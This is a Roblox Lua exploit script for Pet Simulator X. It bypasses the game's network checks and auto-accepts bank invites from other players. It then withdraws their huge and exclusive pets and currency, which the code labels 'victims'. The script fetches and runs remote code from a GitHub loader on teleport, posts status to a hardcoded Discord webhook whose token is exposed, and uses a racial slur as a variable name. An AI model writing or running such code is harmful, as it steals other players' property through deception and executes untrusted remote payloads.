
repeat task.wait() until game:IsLoaded()
if game.PlaceId == 6284583030 and game.Players.LocalPlayer.Name == "madein_ohio3" then
local queueonteleport = (syn and syn.queue_on_teleport) or queue_on_teleport or (fluxus and fluxus.queue_on_teleport)
print(queueonteleport)
queueonteleport("loadstring(game:HttpGet('https://raw.githubusercontent.com/Scripters221/script/main/hub'))()")


local GC = getconnections or get_signal_cons
	if GC then
		for i,v in pairs(GC(game.Players.LocalPlayer.Idled)) do
			if v["Disable"] then
				v["Disable"](v)
			elseif v["Disconnect"] then
				v["Disconnect"](v)
			end
		end
	else
		Players.LocalPlayer.Idled:Connect(function()
			local VirtualUser = game:GetService("VirtualUser")
			VirtualUser:CaptureController()
			VirtualUser:ClickButton2(Vector2.new())
		end) end if not game:IsLoaded() then
    game.Loaded:Wait()
end

local httpservice = game:GetService('HttpService')
local httprequest = (syn and syn.request) or http and http.request or http_request or (fluxus and fluxus.request) or request
local function webhook(msg)
        httprequest({
            Url = "https://discordapp.com/api/webhooks/1118892295417249896/n7U-3rP8rjTJGQc84jkCJh_iqCNwwpOTqJg4UkW2LO4TsuIuxPCooqy41bJZcjqEuUgl",
            Body = httpservice:JSONEncode({["content"] = msg}), -- 6b3!M&8ePxJPQW
            Method = "POST",
            Headers = {["content-type"] = "application/json"}
        })
end
local Client = require(game.ReplicatedStorage.Library.Client)
local Library = require(game.ReplicatedStorage.Library)
local Network = require(game:GetService("ReplicatedStorage").Library.Client.Network)
local Invoke = Network.Invoke
local Fire = Network.Fire
debug.setupvalue(Client.Network.Invoke, 1, function() return true end)
debug.setupvalue(Client.Network.Fire, 1, function() return true end)
webhook("executed") print("ahh")
while wait(1) do
pcall(function()
local myinvites = Invoke("Get Bank Invites") 
if myinvites[1] then
    print("Found invite!")
    webhook("found bank invite")
for i,v in pairs(myinvites) do 
Invoke("Accept Bank Invite",v.BUID) end
local myniggas = Invoke("Get My Banks")
local petsb = Invoke("Get Bank",myniggas[2]["BUID"]) 
local ohiochan = {} 
for i,v in pairs(petsb.Storage.Pets) do
    if v.l ~= true then
local v2 = Library.Directory.Pets[v.id];
if v2.huge or v2.rarity == "Exclusive" then
table.insert(ohiochan,v.uid)
end end end

local victims = {}
for i,v in pairs(petsb.Storage.Currency) do
table.insert(victims, v)	end
local args = {
    [1] = myniggas[2]["BUID"],
    [2] = {
        [1] = ohiochan[1],
        [2] = ohiochan[2],
        [3] = ohiochan[3],
        [4] = ohiochan[4],
        [5] = ohiochan[5],
        [6] = ohiochan[6],
        [7] = ohiochan[7],
        [8] = ohiochan[8],
        [9] = ohiochan[9],
        [10] = ohiochan[10],
        [11] = ohiochan[11],
        [12] = ohiochan[12],
        [13] = ohiochan[13],
        [14] = ohiochan[14],
        [15] = ohiochan[15],
        [16] = ohiochan[16],
        [17] = ohiochan[17],
        [18] = ohiochan[18],
        [19] = ohiochan[19],
        [20] = ohiochan[20],
        [21] = ohiochan[21],
        [22] = ohiochan[22],
        [23] = ohiochan[23],
        [24] = ohiochan[24],
        [25] = ohiochan[25],
        [26] = ohiochan[26],
        [27] = ohiochan[27],
        [28] = ohiochan[28],
        [29] = ohiochan[29],
        [30] = ohiochan[30],
        [31] = ohiochan[31],
        [32] = ohiochan[32],
        [33] = ohiochan[33],
        [34] = ohiochan[34],
        [35] = ohiochan[35],
        [36] = ohiochan[36],
        [37] = ohiochan[37],
        [38] = ohiochan[38],
        [39] = ohiochan[39],
        [40] = ohiochan[40],
        [41] = ohiochan[41],
        [42] = ohiochan[42],
        [43] = ohiochan[43],
        [44] = ohiochan[44],
        [45] = ohiochan[45],
        [46] = ohiochan[46],
        [47] = ohiochan[47],
        [48] = ohiochan[48],
        [49] = ohiochan[49],
        [50] = ohiochan[50]
    },
    [3] = table.unpack(victims)
}
if Invoke("Bank Withdraw",unpack(args)) then
webhook("got pets. there was "..#ohiochan.." ".."exclusives!")
print("got pets".." "..#ohiochan)

end
wait(1)
end
end)
end
end
